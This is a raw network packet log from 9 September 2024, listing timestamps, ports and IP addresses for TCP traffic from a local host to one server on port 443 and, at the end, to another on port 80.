                                              Sep 9, 2024 17:49:11.406146049 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.406209946 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.406213999 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.406236887 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.406276941 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.406811953 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.406872988 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.406873941 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.406898022 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.406936884 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.407798052 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.407866001 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.407870054 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.407892942 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.407932043 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.408675909 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.408736944 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.408745050 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.408760071 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.408803940 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.408869028 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.408934116 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.408936024 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.408955097 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.408993006 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.409698963 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.409760952 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.409770966 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.409782887 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.409821033 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.410598040 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.410661936 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.410675049 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.410685062 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.410721064 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.411631107 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.411695957 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.411705017 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.411719084 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.411756039 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.412539005 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.412610054 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.412620068 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.412632942 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.412671089 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.412741899 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.412815094 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.412818909 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.412842035 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.412884951 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.413485050 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.413544893 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.413553953 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.413570881 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.413614035 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.414361000 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.414433956 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.414434910 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.414455891 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.414500952 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.415205956 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.415265083 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.415271997 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.415287971 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.415333986 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.416078091 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.416150093 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.416160107 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.416197062 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.416251898 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.416259050 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.416326046 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.416387081 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.416390896 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.416412115 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.416457891 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.462146044 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.462172985 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.462271929 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.462304115 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.462574005 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.462693930 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.462711096 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.462744951 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.462757111 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.462773085 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.462810040 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.479542971 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.479564905 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.479620934 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.479620934 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.479646921 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.479762077 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.480252028 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.480273962 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.480309010 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.480319977 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.480335951 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.480936050 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.480952978 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.480989933 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.480998993 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.481015921 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.481914997 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.481981039 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.481981039 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.482007027 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.482044935 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.482115984 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.482177973 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.482178926 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.482206106 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.482244015 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.482861996 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.482927084 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.482933044 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.482959032 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.483000040 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.554172039 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.554266930 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.554274082 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.554302931 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.554325104 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.554358006 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.554552078 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.554625034 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.554657936 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.554662943 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.554685116 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.554734945 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.567526102 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.567555904 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.567645073 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.567645073 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.567667007 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.568428040 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.568454027 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.568484068 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.568495989 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.568511009 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.569044113 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.569062948 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.569103956 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.569116116 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.569133997 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.570717096 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.570744038 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.570779085 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.570790052 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.570806026 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.571502924 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.571522951 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.571562052 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.571571112 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.571594000 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.572079897 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.572104931 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.572138071 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.572144985 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:11.572165012 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:11.774804115 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.616391897 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.616409063 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.616434097 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.616442919 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.616463900 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.616554022 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.616595984 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.616611958 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.616611958 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.616650105 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.617296934 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.617305994 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.617325068 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.617337942 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.617352009 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.617371082 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.617372036 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.617373943 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.617398977 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.617424011 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.617444038 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.618019104 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618030071 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618056059 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618083954 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618103027 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.618103027 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.618120909 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618170977 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.618632078 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618658066 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618707895 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.618709087 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.618719101 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618731976 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618760109 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618777990 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.618792057 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.618819952 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.618839025 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.619720936 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.619744062 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.619790077 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.619811058 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.619834900 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.620599985 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.620628119 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.620671988 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.620672941 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.620682955 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.620704889 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.620738983 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.620783091 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.620783091 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.620796919 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.621540070 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.621568918 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.621606112 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.621624947 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.621653080 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.621653080 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.622394085 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.622420073 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.622572899 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.622572899 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.622590065 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.622941017 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.622967958 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.623008966 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.623028040 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.623050928 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.624162912 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.624185085 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.624227047 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.624243975 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.624268055 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.624268055 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.624497890 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.624526024 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.624569893 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.624569893 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.624584913 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.624617100 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.625298977 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625322104 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625360012 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.625376940 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625400066 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.625849009 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625875950 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625916004 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.625932932 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.625956059 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.626384974 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.626414061 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.626466036 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.626466036 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.626481056 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.627931118 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.627957106 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.628000021 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628007889 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.628057957 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628057957 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628684998 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.628707886 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.628757000 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628757000 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.628763914 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629106998 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629133940 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629159927 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629164934 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629174948 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629189968 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629442930 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629492998 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629523993 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629529953 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629539967 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.629949093 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.629982948 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630004883 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630011082 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630022049 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630034924 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630880117 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630903006 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630930901 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630935907 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.630945921 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.630996943 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631026983 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631035089 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631040096 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631081104 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631124973 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631836891 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631864071 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631895065 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631900072 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631910086 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631934881 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631949902 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.631953955 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631968975 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.631980896 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632014036 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632019043 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632122040 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632831097 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632886887 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632894993 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632900000 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632939100 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.632946014 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.632963896 CEST44349168207.241.227.96192.168.2.22
                                              Sep 9, 2024 17:49:12.633006096 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.636142015 CEST49168443192.168.2.22207.241.227.96
                                              Sep 9, 2024 17:49:12.769052029 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:12.774326086 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:12.774405956 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:12.774596930 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:12.779618979 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417831898 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417851925 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417900085 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417957067 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.417949915 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.418055058 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.418266058 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418289900 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418303013 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418329000 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.418428898 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418442011 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418452978 CEST8049169185.235.137.223192.168.2.22
                                              Sep 9, 2024 17:49:13.418469906 CEST4916980192.168.2.22185.235.137.223
                                              Sep 9, 2024 17:49:13.418504000 CEST4916980192.168.2.22185.235.137.223
